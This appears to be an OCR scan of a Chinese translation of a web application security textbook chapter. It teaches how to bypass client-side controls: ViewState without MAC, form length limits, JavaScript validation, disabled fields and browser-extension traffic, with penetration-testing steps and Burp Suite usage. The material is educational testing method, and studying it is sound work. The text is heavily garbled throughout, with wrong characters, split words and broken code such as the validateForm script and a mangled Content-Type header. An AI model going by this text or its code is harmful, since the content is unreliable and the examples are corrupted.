图 $-3 ”如 果 未 设置 EnableViewStateMac 选 项 ，Burp Proxy 可 解码 并 显示 
ViewState， 人 允许 攻击 者 查看 其 内 容 并 对 它们 进行 编辑 

















尝试 访问 


http://mdsec.net/shop/76/ 
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渗透 测试 步 又 


(1) 如 采 要 攻击 ASPNET 应 用 程序 ， 确 定 是 否 对 ViewState 局 用 了 了 MAC 保护。 如 条 











ViewState 结 构 末 尾 存 在 一 个 20 字 节 的 散 列 , 即 表示 应 用 程序 启用 了 了 MAC 保护 ,可 以 使 用 Burp 
Suite 中 的 解析 帮 确 定 上 述 散 列 是 否 存在 。 

(2) 即使 Viewstate 受 到 保护 ， 还 可 以 解码 各 种 不 同 应 用 程序 页 面 中 的 ViewState 参 数 ， 
了 解 应 用 程序 是 否 使 用 viewstate 通 过 客户 端 传 送 任 何 敏 感 数 据 。 

(3) 尝试 修改 viewState 中 某 个 特殊 参数 的 值 ， 但 不 破坏 它 的 结构 ， 看 看 是 否 会 导致 错误 


























消息 。 
(4) 如 果 能 够 修改 viewState 而 不 会 造成 错误 , 则 应 该 分 析 Viewstate 中 每 个 参数 的 功能 ， 
以 及 应 用 程序 是 否 使 用 这 些 参 数 保 存 任何 定制 数据 。 尝 试用 专门 设计 的 值 代 蔡 每 一 个 参数 , 探 
查 和 常见 的 漏洞 ， 就 像 检 查 通 过 客户 端 传 送 的 其 他 数据 项 一 样 。 

(5) 注意 ,不 同 页 面 可 能 启用 或 禁用 MAC 保 护 ， 因 此 有 必要 测试 应 用 程序 的 每 一 个 重要 页 
面 , 了 解 其 中 是 否 存 在 viewSstate 攻 击 漏洞 。 如 果 在 局 用 被 动 扫描 的 情况 下 使 用 Burp Scanner， 
Burp 将 自动 报告 任何 使 用 viewState 但 未 局 用 MAC 保 护 的 页 面 。 























5.2 ”收集 用 户 数据 : HTML 表单 


应 用 程序 使 用 客户 站 控件 限制 客户 奖 提 交 的 数据 的 万 一 个 主要 控制 对 象 , 是 最 初 不 由 服务 体 
指定 ， 而 是 由 客户 端 计 算 机 目 己 收集 的 数据 。 

HTML 表 单 是 一 种 最 人 简单、 最 常用 的 机 制 ， 主 要 用 于 从 用 户 收集 输入 并 将 其 提交 给 服务 人 右 。 
用 户 在 已 命名 的 文本 字段 中 输入 数据 ， 再 将 它们 以 名 / 值 对 的 形式 提交 给 服务 右 ， 是 这 种 方法 的 
最 基本 应 用 。 但 是 ,表单 还 有 其 他 用 法 ， 即 对 用 户 提交 的 数据 施加 限制 或 执行 确认 检查 。 当 应 用 
程序 使 用 这 些 客户 问 控 件 作 为 安全 机 制 ， 防 御 有 恶意 输入 时 ， 攻 击 者 通常 能 够 轻易 避 开 这 些 控件 ， 
分 使 应 用 程序 非 第 易于 受到 攻击 。 


5.2.1 长 度 限制 
下 面 对 本 章 开 头 部 分 的 HTML 表单 稍 作 修 改 ， 规 定 auantity 字 段 的 最 大 长 度 为 1: 


<form method="post" action="Shop.aspx?pbrod=1"> 

Product: iPhone 5 <br/> 

Price: 449 <br/> 

Ouantity: <input type="text" name="quantity" maxlength="1"> <br/> 





























<input type="hidden" name="price" value="449"> 

<input type="submit" value='"Buy'"> 

</form> 

于 是 ， 浏 览 絮 将 阻止 用 户 在 输入 字段 中 输入 任何 超过 1 个 字符 的 值 ， 而 且 服 务 右 端 应 用 程序 
也 认为 它 收 到 的 quantity 参 数 将 小 于 10。 但 是 ,通过 拦截 提交 表单 的 请 求 ， 并 在 其 中 输入 任意 
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值 ; 或 拦截 包含 表单 的 啊 应 ， 并 删除 maxlength 属 性 ， 束 可 以 轻易 避 开 这 种 限制 。 


拦截 响应 
试图 拦 帘 并 修改 服务 带 啊 应 时 ， 攻 击 者 可 能 发 现代 理 服务 囊 显 示 以 下 相关 消息 。 


HTTP/1.1 304 Not Modified 

Date: Wed, 6 Jul 2011 22:40:20 GMT 
Etag: "6c7-5fcc0900" 

Expires: Thu, 7 Jul 2011 00:40:20 GMT 
Cache-Control: max-age=7200 


产生 这 个 啊 应 是 因为 浏览 大 已 经 在 绥 存 中 保存 了 所 请 求 资源 的 副本 。 当 浏览 大 请 求 一 个 已 
存 和 人 绥 存 的 资源 时 ， 它 通 第 会 在 请 求 中 添加 男 外 两 个 消息 涉 ， 分别 为 If-Modi fied-since 和 
If-None-Match 消 息 头 ， 如 下 所 示 : 


GET /scriDts/alidace.Js TD/ 1 

Host: wahh-app.com 

If-Modified-Since: Sat, 7 Jul 2011 19:48:20 GMT 
If-None-Match: "6c7-5fcc0900" 


这 些 消 息 头 告诉 服务 融 浏 览 硕 上 次 更 新 缓存 副本 的 时 间 。BEtag 字 人 符 串 〈 由 服务 硕 随 资源 
副本 一 起 提供 ) 是 一 种 序列 号 ， 服务 从 为 每 个 可 绥 存 的 资源 分 配 一 个 Etag， 如 果 资 源 被 修改 ， 
它 也 会 随 之 更 新 。 如 果 服 务 器 拥有 比 If-Modified-since 消 息 头 中 指定 日 期 更 新 的 资源 ,或 
者 如 东 当 前 版 本 的 Etag 与 IE-None-Match 消 息 头 中 指定 的 Etag 不 匹配 , 那么 服务 从 就 会 在 啊 
应 中 提供 最 新 的 资源 。 人 否则 ， 它 将 返回 和 本 例 相 同 的 304 啊 应 ， 通 知 训 览 融资 源 没有 被 修改 ， 
浏览 硕 应 使 用 绥 存 中 的 副本 。 

如 末 是 这 样 ， 必 须 拦 截 并 修改 浏览 闸 保 存在 缓存 中 的 资源 ， 可 以 拦截 相关 请 求 并 删除 
If-Modifiedq-Since 和 If-None-Match 消 息 头 ,让 服务 需 在 啊 应 中 提供 所 请 求 资源 的 完整 版 
本 。Burp Proxy 中 有 一 个 从 每 个 请 求 中 删除 这 些 消 息 头 的 选项 ， 可 上 履 善 由 浏览 硕 发 送 的 所 有 组 
存 信息 。 
































渗透 秀 测试 步骤 








(1) 寻找 包含 maxlength 属 性 的 表单 元 素 。 提 交大 于 这 个 长 度 但 其 他 格式 合法 的 数据 ( 例 
如 ， 如 果 应 用 程序 要 求 数字 ， 则 提交 一 个 数值 )。 

(2) 如 果 应 用 程序 接受 这 个 超 长 的 数据 ， 则 可 以 据 此 推断 出 服务 器 并 没有 采用 客户 端 确认 
机 制 | 。 

(3) 根据 应 用 程序 随后 对 参数 进行 的 处 理 , 可 以 通过 确认 机 制 中 存在 的 缺陷 利用 其 他 漏洞 ， 
如 SQL 注入 、 野 站 点 脚本 或 缓冲 区 洲 出 。 
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5.2.2 ”基于 脚本 的 确认 


HTML 表 单 内 置 的 输入 确认 机 制 极 其 价 单 , 而 且 不 够 详细, 不 足以 对 各 种 输入 执行 相关 确认 。 
例如 ,用 户 注册 表单 中 可 能 包含 姓名 、 电 子 邮件 地 址 、 电 话 号 他 和 邮政 编码 字段 ， 所 有 这 些 字 段 
都 要 求 不 同 的 输入 。 因 此 ,开发 者 通 第 在 脚本 中 执行 定制 的 客户 端 输入 确认 。 下 面 对 本 半 开 尖 的 
示例 进行 一 些 修 改 ， 以 说 明 这 个 问题 : 


<form method="post" action="Shop.aspx?prod=2" onsubmit="return 








validateForm(this} "> 

Product: Samsung Multiverse <br/> 

Price: 399 <br/> 

Ouantity: <input type="text" name="gquantity'"> (Maximum quantity is S50) 
<br/> 

<input type="submit" value="Buy"> 

</form> 


<Script>function validateForm!{(therorm) 
{ 
var isInteger = /^\d+s/;: 
var valid = isIinteger.test (quantity) && 
quantity > 0 && quantity <= 50; 
if {ivalid) 


alert{'Please enter a valid quantity'): 





return valid:; 
} 


</Script> 


尝试 访问 


http://mdsec.net/shop/139/ 





form 标 签 的 onsubmit 属 性 指示 浏览 冀 在 用 户 单 击 “ 提 交 ” 按 钮 时 运行 ValidateForm 峭 数 ， 
并 且 只 有 在 该 因数 返回 “ 真 ”时 才 提 区 表单 。 这 种 机 制 帮助 客户 端 阻止 提交 表单 的 企图 ， 对 用 户 
的 输入 执行 定制 的 确认 检查 ， 进 而 决定 是 否 接受 该 输入 。 上 面 示 例 中 采用 的 确认 机 制 极其 简单 ， 
只 检查 在 amout 字 段 中 输入 的 数据 是 否 为 介 于 1 到 50 之 间 的 整数 。 

这 种 类 型 的 客户 闪 控 制 非常 容 兄 解除 ,但 通 笛 在 训 览 硕 中 丛 用 JavaScript 束 够 了 -如 有 果 是 这 样 ， 
并 且 忽 上 略 onsubmit 必 性， 那么 ， 不 需要 任何 定制 确认 就 可 以 提交 表单 。 

但 是 ， 如 果 应 用 程序 依靠 客户 端 脚本 执行 正 稼 操作 〈 如 构造 部 分 用 户 界 面 )， 完 全 禁用 
JavaScript 可 能 会 终止 应 用 程序 。 另 一 种 更 加 合理 的 办 法 是 在 浏览 大 的 输入 字段 中 输入 一 个 恨 性 
(已 知 无 恶意 ) 什 ， 然 后 用 代理 服务 大 拦截 确认 后 提交 的 表单 ， 并 将 其 中 的 数据 修改 成 想 要 的 值 。 
通常 ， 这 是 解除 基于 JavaScript 的 确认 的 最 简单 有 效 的 方法 。 

另外 ， 可 以 拦截 包含 JavaScript 确 认 程 序 (validation routine ) 的 服务 套 啊 应 ， 修 改 其 脚本 使 
Sk 在 前 面 的 示例 中 ， 更 改 每 一 个 validqateForm 困 数 使 其 返回 “ 真 ” 即 可 。 






































渗透 秀 测试 步 

(1) 和 提交 表单 前 使 用 客户 端 JavaScript 进 行 输入 确认 的 情况 。 

(2) 通过 修改 所 提交 的 请 求 ， 在 其 中 插入 无 效 数据 ， 或 修改 确认 代码 使 其 失效 ， 癌 服务 响 
提交 确认 机 制 通常 会 阻止 的 数据 。 

(3) 与 长 度 限 制 一 样 ， 确 定 服 务 需 是 否 采用 了 和 客户 端 相同 的 控件 ; 如 果 并 非 如 此 ， 确 定 
是 否 可 利用 这 种 情况 实现 任何 恶意 意图 。 

(4) 注意 ， 如 采 在 提交 表单 有 有 几 个 输入 字段 需要 由 客户 端 确 认 机 制 检验 ， 需 要 分 别 用 无 
效 数据 测试 每 “个 字段 同时 在 所 有 其 他 字 段 中 使 用 有 效 数 据 。 如 果 同 时 在 几 个 字段 中 提交 无 
效 数 据 , 可 能 服务 需 在 识别 出 第 一 个 无 效 字 段 时 就 已 经 停止 执行 表单 , 从 而 使 测试 无 法 到 达 应 
用 程序 的 所 有 可 能 代码 路 径 。 





























注解 ”使 用 客户 端 JavaScript 程 序 确认 用 户 输入 的 做 法 在 Web 应 用 程序 中 非常 普遍 ， 但 
这 并 不 表示 这 种 应 用 程序 全 都 易于 遭受 攻击 。 只 有 当 服 务 器 并 未 采用 和 客户 端 相同 的 
确认 机 制 ， 以 及 能 够 避 开 客户 端 确认 的 专门 设计 的 输入 可 在 应 用 程序 中 造成 某 种 无 法 
预料 的 行为 时 ， 应 用 程序 才 存 在 风险 。 

在 绝 大 多 数 情况 下 ， 在 客户 端 确 认 用 户 输入 有 助 于 提高 应 用 程序 的 性 能 ， 改 善 用 





户 体 验 。 例如， 在 填写 详细 的 注册 表单 时 ， 首 通用 户 可 能 会 犯 许多 错误 ， 如 忽略 必要 
的 字段 或 电话 号 码 格 式 出 现 错误 。 如 果 不 采 用 客户 端 确 认 机 制 ， 更正 这 些 错 误 可 能 需 
要 多 次 加 载 注 册页 面 ， 反复 向 服务 器 传送 消息 。 在 客户 端 执行 基本 的 确认 检查 可 使 用 
户 体 验 更 佳 ， 减 轻 服务 器 的 负担 ， 





5.2.3 ” 葵 用 的 元 素 


如 果 HTML 表 单 中 的 一 个 元 素 标 记 为 禁用 ， 它 会 在 屏幕 上 出 现 , 但 以 灰色 显示 ， 并 且 无 法 像 
各 规 控 件 那样 编辑 或 使 用 。 而 且 ， 提 区 表单 时 ， 表 单 也 不 辐 服 务 硕 传送 这 个 元 素 。 以 下 面 的 表单 
为 例 : 

<form method="post" action='"Shop.aspx?prod=5'"> 


Product: Blackberry Rude <br/> 
Price: <input type="text'" disabled="true'" name='"pPrice'" value="299"> 

















<bI/> 

Quantity: <input type="text" name="gquantity'"> (Maximum quantity is S50) 
<bIr/> 

<input type="submit" value="Buy"> 

</form> 


这 个 表单 中 的 产品 价格 位 于 禁用 的 文本 字段 中 ， 并 出 现在 屏幕 上 ， 如 图 $-4 所 示 。 
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Please enter the regqulred quantity: 


Product: Blackberry Rude 


Price: 


(Maximum quantity is 50) 





图 5-4 ”包含 禁用 的 输入 字段 的 表单 


提交 该 表单 时 ， 应 用 程序 只 向 服务 器 传送 acuantity 人 参数 。 但 是 ， 存 在 禁用 字段 表示 应 用 程 
序 最 初 可 能 已 经 使 用 过 price 参 数 ( 可 能 在 开发 阶段 用 于 测试 目的 )。 这 个 参数 很 可 能 已 经 提交 
给 服务 器 并 经 过 应 用 程序 处 理 了 。 在 这 种 情况 下 , 应 当 测试 服务 器 端 应 用 程序 是 否 仍 然 会 处 理 这 
个 参数 。 如 果 确 实 如 此 ， 可 以 尝试 对 这 种 情况 加 以 利用 。 























尝试 访问 
http://mdsec.net/shop/104/ 





渗透 测试 步 双 


(1) 在 应 用 程序 的 每 一 个 表单 中 寻找 禁用 的 元 系 。 和 尝试 将 发 现 的 每 一 个 元 系 与 表单 的 其 他 




















参数 一 起 提交 给 服务 带 ， 确 定 其 是 否 有 效 。 

(2) 通常 ， 如 末 提 交 元 素 被 标记 为 禁用 ， 其 按钮 即 以 灰色 显示 ， 表 示 相 关 操 作 无 效 。 这 时 
应 该 答 试 提交 这 些 元 素 的 名 称 ， 确 定 应 用 程序 是 否 在 执行 所 请 求 的 操作 前 执行 服务 带 冰 检查 。 

(3) 注意 ， 在 提交 表单 时 ， 浏 览 夯 并 不 包含 茶 用 的 表单 元 素 ; 因此 ， 仅 仅 通 过 浏览 应 用 程 
序 的 功能 以 及 监控 由 训 览 融 发 布 的 请 求 并 不 能 确定 其 中 是 否 含有 公用 的 元 系 。 要 确定 茶 用 的 元 
系 ， 必 须 监 控 服 务 邵 的 啊 应 或 在 浏览 齿 中 查看 页 面 来 源 。 

(4) 还 可 以 使 用 Burp Proxy 中 的 HTML 修 改 功 能 自动 重新 局 用 应 用 程序 中 的 任何 禁用 的 
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除 HIML 和 单 外 ,万 一 种 收集 、 确 认 并 提交 用 户 数据 的 主要 方法 是 使 用 在 浏览 俘 扩 展 中 运行 
的 客户 端 组 件 〈 如 Java 或 Flash )。 最 初 用 于 Web 应 用 程序 时 ， 浏 览 囊 扩展 通 第 用 于 执行 简单 而 基 
本 的 任务 。 如 今 ， 已 经 有 越 来 越 多 的 公司 使 用 浏览 带 扩 展 来 创建 功能 强大 的 客户 端 组 件 。 这 些 组 
件 在 浏 顺带 中 运行 , 跨越 多 个 客户 闯 平 侣 , 提供 相关 反馈 , 提高 灵活 性 , 并 与 果 面 应 用 程序 协作 。 
使 用 浏览 硕 扩 展 的 一 个 副作用 是 : 由 于 速度 和 用 户 体验 方面 的 原因 , 之 前 在 服务 胡 上 执行 的 处 理 
任务 现在 将 在 客户 端 完成 。 对 某 些 应 用 程序 ( 如 网 上 交易 应 用 程序 ) 而 言 ,速度 至 关 重 要 , 因此 ， 
许多 关键 的 应 用 程序 任务 需要 在 客户 问 完 成 。 为 了 提高 速度 , 在 开发 应 用 程序 时 可 能 需要 “有 意 ” 
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以 牺牲 安全 为 代价 , 这 可 能 是 因为 开发 者 误 以 为 交易 者 全 部 是 可 信用 户 , 或 者 浏览 絮 扩 展会 自行 
防御 恶意 企图 。 但 是 ， 如 我 们 在 第 2 草 以 及 本 章 前 面部 分 讨论 核心 安全 问题 时 所 述 ， 客 户 问 组 件 
不 可 能 为 目 己 的 业务 逻辑 提供 防御 。 

浏览 融 扩展 可 以 通过 输入 表单 、 或 者 在 某 些 情况 下 通过 与 客户 端 操 作 系 统 的 文件 系统 或 注册 
表 交 互 ， 以 各 种 不 同 的 方式 收集 数据 。 在 将 收集 到 的 数据 提交 给 服务 善之 前 , 它们 可 以 对 这 些 数 
据 执行 任何 复杂 的 确认 和 处 理 。 而 且 , 由 于 它们 的 内 部 工作 机 制 与 HTML 表单 和 JavaScript 相 比 更 
加 不 透明 ， 开 发 者 认为 它们 执行 的 确认 更 加 难以 因 避 。 为 此 ,通过 浏览 硕 扩 展 查找 Web 应 用 程序 
中 存在 的 漏洞 往往 能 够 获得 更 大 的 成 果 。 

赌博 组 件 是 应 用 客户 端 控件 的 典型 浏览 需 扩 展 。 如 前 所 述 ， 客 户 端 控件 并 不 可 靠 ， 因 此 ， 如 
果 使 用 在 淤 在 攻击 者 的 机 龙 上 本 地 运行 的 浏览 融 扩 展 来 执行 在 线 赌 博 应 用 程序 , 这 种 做 法 将 非常 
具有 迹 惑 力 。 如 采 游 戏 的 任何 一 个 部 分 由 客户 问 而 非 服 务 融 控制 , 攻击 者 就 可 以 非常 精确 地 对 游 
戏 进行 控制 ， 以 提高 获胜 机 率 、 改 变 规 则 、 或 更 改 返 回 给 服务 需 的 得 分 。 这 种 情况 将 导致 以 下 几 
































种 攻击 。 
口 可 能 会 使 用 客户 端 组 件 来 维护 游戏 状态 。 这 时 ， 攻 击 者 就 可 以 在 本 地 自 改 游戏 状态 ， 从 
而 在 洲 戏 中 获得 优势 。 


口 攻击 者 能 够 避 开 客户 产 控 件 ， 并 执行 非法 操作 ， 以 在 洲 戏 中 获得 优势 。 

D 攻击 者 能 够 发 现 隐 藏 的 功能 、 参 数 或 资源 ,一旦 调用 这 些 功 能 、 参 数 或 资源 ， 攻 击 者 将 
可 以 非法 访问 服务 带 端 资源。 

口 如 采 洲 戏 中 还 有 其 他 玩家 ， 客 户 闪 组 件 可 能 会 接收 并 处 理 其 他 玩家 的 信息 ， 攻 击 者 获知 
这 些 信息 就 能 够 在 游戏 中 获得 优势 。 


5.3.1 弟 见 的 浏览 器 扩展 技术 


第 见 的 浏览 大 扩 展 搁 术 包 括 Java applet、Flash 和 Silverlight。 由 于 这 些 技术 的 用 途 基 本 相同 ， 
因此 ， 它们 也 提供 类 似 的 安全 功能 : 

口 它们 均 编 译 成 中 间 字 和 人 码 ; 

口 它们 在 提供 沙 盒 执 行 环 境 的 虚拟 机 中 运行 ; 

口 它们 可 能 会 使 用 远程 框架 ,这 类 框架 采用 序列 化 来 传输 复 洒 数据 结构 ， 或 通过 HTTP 传 送 

对 和 象 。 

1. Java 

Java applet 在 Java 虚 拟 机 (JVM ) 中 运行 , 并 采用 由 Java 安 全 策略 应 用 的 沙 盒 。 因 为 Java 在 Web 
发 展 的 早期 就 已 存在 , 并 且 其 核心 概念 仍 基本 不 变 , 因此 , 有 大 量 知 识 和 工具 可 用 于 对 Java applet 
实施 攻击 或 进行 防御 〈 如 本 草 后 面部 分 所 述 )。 

2. Flash 

Flash 对 和 象 在 Flash 虚 拟 机 中 运行 。 和 Java applet 一 样 ,Flash 也 要 在 主机 上 的 沙 盒 中 运行 。 此 前 ， 
Flash 主 要 用 于 传送 动画 内 容 。 但 随 着 较 新 版 本 的 ActionScript 的 推出 ， 现 在 Flash 已 经 能 够 传送 成 
熟 的 桌面 应 用 程序 。Flash 最 近 的 主要 更 新 为 ActionScript 3 以 及 采用 动作 信息 格式 ( AMF ) 序列 
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化 的 远程 功能 。 

3. Silverlight 

Silverlight 是 微软 开发 的 与 Flash 类 似 的 产品 。 同样, 该 产品 主要 用 于 局 动 各 种 果 面 应 用 程序 ， 
人 允许 Web 应 用 程序 在 浏览 带 内 的 沙 盒 环境 中 提供 精简 的 .NET 体 验 。 从 技术 上 讲 ， 任 何 兼 容 .NET 
的 语言 ， 从 C# 到 Python， 都 可 用 于 开发 Silverlight， 但 C# 是 开发 Silverlight 最 常用 的 语言 。 


5.3.2 攻击 浏览 器 扩展 的 方法 


针对 使 用 浏览 此 扩展 组 件 的 应 用 程序 实施 攻击 时 ， 宕 要 采用 以 下 两 种 常用 的 技巧 。 

首先 ,可 以 拦截 并 修改 浏览 器 扩展 组 件 提 出 的 请 求 及 服务 器 的 响应 。 在 许多 情况 下 ,这 是 对 
训 览 融 扩 展 组 件 进行 测试 的 最 简单 也 是 最 快速 的 方法 , 但 这 时 你 可 能 会 遇 到 各 种 限制 。 正 在 传输 
的 数据 可 能 经 过 模糊 处 理 或 加 密 , 或 者 使 用 专门 针对 所 用 技术 的 方案 进行 了 序列 化 。 仪 仪 查看 组 
件 生成 的 流量 , 可 能 会 忽略 一 些 关 键 的 功能 或 业务 逻辑 ,而 这 些 功 能 或 逻辑 只 需 对 组 件 本 里 进行 
分 析 就 可 以 发 现 。 为 外 ， 在 正常 使 用 拦截 代理 服务 各 时 也 可 能 会 遇 到 障碍 ; 但 是 ， 通 第 情况 下 ， 
通过 仔细 配置 ( 如 本 章 后 面部 分 所 述 )， 完 全 可 以 克服 这 些 障碍 。 

其 次 ,可 以 直接 针对 组 件 实施 攻击 ,并 尝试 反 编译 它 的 字 广 码 ， 以 查看 其 源 代码 ; 或 者 使 用 
调试 带 与 组 件 进行 动态 交互 。 这 种 方法 的 优点 在 于 ， 如 来 进行 得 非常 彻 压 的 话 ， 将 能 够 确定 组 件 
文 持 或 引用 的 所 有 功能 。 还 能 修改 组 件 回 服 务 带 提交 的 请 求 中 的 关键 数据 ， 而 无 论 这 些 数据 采用 
何 种 模糊 处 理 或 加 蜜 机制。 其 缺点 在 于 ， 这 种 方法 可 能 相当 充 时 ,并 且 需 要 深信 了 解 浏览 郁 扩 展 
组 件 所 使 用 的 技术 和 编程 语言 。 

许多 时 候 ， 最 好 是 结合 使 用 上 述 两 种 技巧 。 下 面 我 们 详细 介绍 这 种 技巧 。 


5.3.3 ” 拦 稚 浏览 器 扩展 的 流量 


如 果 浏 览 带 已 配置 为 使 用 拦截 代理 服务 各 ,并且 应 用 程序 使 用 浏览 带 扩 展 加 载 客 户 端 组 件 ， 
这 时 , 该 组 件 提 出 的 请 求 将 经 过 代理 服务 融 。 在 某 些 情况 下 ,这 时 就 可 以 开始 测试 相关 功能 ， 因 
为 攻击 者 能 够 以 常规 方式 拦截 并 修改 组 件 提 出 的 请 求 。 

在 需要 避 开 在 浏览 需 扩 展 中 实施 的 客户 端 输入 确认 的 情况 下 , 如 果 组 件 以 透明 方式 向 服务 器 
提供 经 过 确认 的 数据 ， 那 么 ， 如 5.2 节 所 述 ， 可 以 使 用 拦截 代理 服务 硕 修 改 这 些 数 据 。 例 如 ， 文 
持 吴 份 验证 机 制 的 浏 览 融 扩展 可 能 会 收集 用 户 证 书 , 并 对 这 些 证 书 进 行 确认 , 然后 在 请 求 中 以 明 
文 参数 的 形式 向 服务 从 提交 这 些 证 书 。 这 时 ,攻击 者 不 需要 对 组 件 本 里 进行 任何 分 析 或 攻击 ,就 
可 以 轻松 解除 这 种 确认 。 

在 其 他 情况 下 ， 测 试 浏览 带 扩 展 组 件 可 能 会 遇 到 各 种 障碍 。 以 下 儿 市 将 讨论 这 些 问题 。 

1. 处 理 序列 化 数据 

应 用 程序 可 能 会 首先 对 数据 或 对 象 进行 序列 化 处 理 ， 然 后 再 通过 HTTP 请 求 传送 这 些 数 据 或 
对 象 。 当 然 ， 通过 检查 原始 的 序列 化 数据 ， 可 以 解 详 一 些 基于 字符 串 的 数据 ,但 是 ， 通 闸 而 言 ， 
需要 对 序列 化 数据 进行 解压 缩 才 能 了 解 这 些 数据 。 如 来 布 望 修 改 这 些 数 据 ， 以 破坏 应 用 程序 的 处 
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理 过 程 ， 首先 ， 需 要 解压 缩 序列 化 内 容 ， 对 其 进行 必要 的 编辑 ， 然 后 重新 对 其 进行 序列 化 处 理 。 
几乎 可 以 肯定 ， 下 接 编辑 原始 的 序列 化 数据 将 破坏 其 格式 ， 并 在 应 用 程序 处 理 请 求 时 导致 解析 
错误 。 

每 种 浏 览 融 扩展 技术 都 具有 各 上 自 处 理 HTTP 消 息 中 数据 的 序列 化 方案 。 因 此 ， 通 滑 渗 透 测试 
员 可 以 根据 所 采用 的 客户 端 组 件 推 新 出 相关 数据 的 序列 化 格式 , 但 是 , 任何 时 候 , 仔细 检查 相关 
HTTP 消 息 才 能 确认 序列 化 格式 。 

@ Javalj [| | 

Java 语 言 本 二 支持 对 和 象 序列 化 ， 而 且 ，Java applet 可 能 会 以 这 种 方式 在 客户 闪 与 服务 天 应 用 
程序 组 件 之 间 传 送 序 列 化 数据 结构 。 通 常 ， 包 含 序 列 化 Java 对 和 象 的 消息 很 容易 辨别 ， 因 为 它们 使 
用 以 下 content-Type 消 息 头 : 

Content-Type: application/x-Java-serialized-object 

使 用 代理 服务 融 拦 截 原 始 的 序列 化 数据 后 ， 就 可 以 通过 Java 对 这 些 数据 进行 去 序列 化 处 理 ， 
以 查看 其 中 包含 的 原 二 数据 项 。 

Dser 是 Burp Suite 中 的 一 个 有 用 插件 ， 该 插件 提供 一 个 框架 ， 可 用 于 查看 和 处 理 Burp 拦 截 的 
序列 化 Java 对 象 。 该 工具 将 拦截 到 的 对 象 中 的 原 语 数据 转换 为 XML 格式 ， 以 便于 进行 编辑 。 编 辑 
相关 数据 后 ，Dser 将 重新 对 对 象 进行 序列 化 ， 并 对 HTTP 请 求 进行 相应 的 更 新 。 

可 以 在 以 下 URL 下 载 Dser 并 详细 了 解 它 的 运行 机 制 : 

http://blog.andlabs.org/2010/09/re-visiting-java-de-serialization--it.html 

® Flashf] 0 0 

Flash 使 用 目 己 的 可 用 于 在 服务 各 和 客户 问 组 件 之 间 传 输 复 林 数 据 结 构 的 序列 化 格式 。 通 营 ， 
可 以 通过 以 下 content-Type 消 息 头 辨别 动作 信息 格式 〈AMEF ): 

Content-Type: application/x-amf 

Burp 本 身 支持 AMF 格 式 。 确 定 包 含 序 列 化 AMF 数 据 的 HTTP 请 求 或 响应 后 ， 它 会 解压 缩 并 以 
树 状 形式 显示 相关 内 容 ， 以 便于 查看 和 编辑 ， 如 图 5-5 所 示 。 在 修改 结构 中 的 相关 原 语 数据 项 后 ， 
Burp 将 重新 对 消 奶 进行 序列 化 ， 然 后 就 可 以 将 该 消 朋 转发 给 服务 各 或 客户 问 ， 由 它们 进行 处 理 。 

@ Silverlight[l| [| [ 

Silverlight 应 用 程序 能 够 利用 .NET 平 台 内 置 的 Windows 通 信和 基础 (WCF ) 远 程 框架 。 使 用 WCF 
的 Silverlight 客 户 端 组 件 通 稼 采用 微软 的 用 于 SOAP 的 .NET 二 进 制 格式 ( .NET Binary Format for 
SOAP，NBFS )。 可 以 通过 以 下 content-Type 消 息 头 辨别 该 格式 : 



























































Content-Type: abpplLicatiomnscoab+mspim1 

Burp Proxy 中 的 一 个 插件 能 够 目 动 对 NBFS 编 辑 的 数据 进行 去 序列 化 ,然后 在 Burp 的 拦截 窗口 
中 显示 这 些 数 据 。 在 查看 或 编辑 已 解码 的 数据 后 ,该 插件 会 对 数据 重新 进行 编辑 ,然后 将 数据 转 
发 给 服务 需 或 客户 端 ， 由 它们 进行 处 理 。 

用 于 Burp 的 WCF 二 进 制 SOAP 搬 件 由 Brian Holyfield 开 发 ， 可 以 从 以 下 URL 下 载 该 插件 : 


www.gdssecurity.com/l1/b/2009/11/19/wcf-binary-soap-plug-in-for-burp/ 
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| | 
burp suite professional v1.2.14 =) 








burp intruder repeater window help 





target | proxy | spider | scanner | intruder 人 repeater | sequencer | decoder | comparer | options | alerts | 











host |www.myapp.com | 








443 | ”区 tse SsL 




















Version 
LoginHandler 
LoginHandler 
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password | 
false 
1.4817498139431134E16 


39.0 
number 2.0 














= 











response 


| hex | 






































图 5-5 Burp Suite 文 持 AMEF 格 式 并 人 允许 查看 和 编辑 去 序列 化 数据 


2. 拦截 浏览 器 扩展 流量 时 遇 到 的 障碍 

如 果 浏 览 磺 已 设置 为 使 用 拦截 代理 服务 器 , 代理 服务 磊 可 能 并 不 会 拦截 , 或 无 法 拦截 浏览 如 
扩展 组 件 提出 的 请 求 。 之 所 以 出 现 这 种 情况 ， 可 能 是 由 于 组 件 的 HTTP 代 理 或 SSL 出 现 问 题 ,或 
者 二 者 同时 出 现 问 题 。 一 般 情况 下 ， 通 过 仔细 配置 代理 服务 器 可 解决 这 个 问题 。 

第 一 个 问题 是 , 客户 端 组 件 可 能 并 不 执行 在 浏览 融 或 计算 机 的 设置 中 指定 的 代理 配置 。 这 是 
因为 组 件 可 能 会 在 浏览 器 本 身 或 扩展 框架 提供 的 API 以 外 发 出 它们 自己 的 HTTP 请 求 ,出 现 这 种 情 
况 仍 然 可 以 拦截 组 件 的 请 求 , 但 需要 修改 计算 机 的 hosts 文 件 以 实现 拦截 目的 , 同时 将 代理 服务 器 
配置 为 支持 匿名 代理 ， 并 自动 重 定向 到 正确 的 目标 主机 。 更 多 详细 信息 ， 请 参阅 第 20 章 。 

另 一 个 问题 在 于 ， 客 户 端 组 件 可 能 不 接受 拦截 代理 服务 需 提 供 的 SSL 证 书 。 即 使 代理 服务 套 
使 用 的 是 一 般 自 签名 证 书 , 并 且 浏 览 需 已 配置 为 接受 这 类 证 书 , 但 浏览 器 扩展 组 件 仍 有 可 能 拒绝 
此 类 证 书 。 这 可 能 是 因为 浏览 器 扩展 组 件 不 接受 浏览 需 在 暂时 可 信 的 证 书 方 面 的 配置 ， 或 者 因为 
组 件 本 身 以 编程 方式 要 求 拒 绝 接受 不 可 信 的 证 书 。 无 论 是 哪 一 种 原因 ,都 可 以 将 代理 服务 髓 配置 
为 使 用 一 个 主 CA 证 书 ( 用 于 为 访问 的 每 个 站 点 的 每 台 主 机 签署 有 效 的 证 书 )， 并 在 计算 机 的 可 信 
证 书库 中 安装 该 CA 证 书 ， 从 而 解决 这 个 问题 。 更 多 详细 信息 ， 请 参阅 第 20 章 。 

有 些 时 候 ， 客 户 端 组 件 还 使 用 除 HTTP 以 外 的 协议 进行 通信 ， 而 拦截 代理 服务 需 却 无 法 处 理 
这 些 协议 。 在 这 些 情况 下 ， 仍 然 可 以 通过 使 用 网 络 嗅 探 需 或 功能 挂钩 工具 查看 并 修改 相关 流量 。 
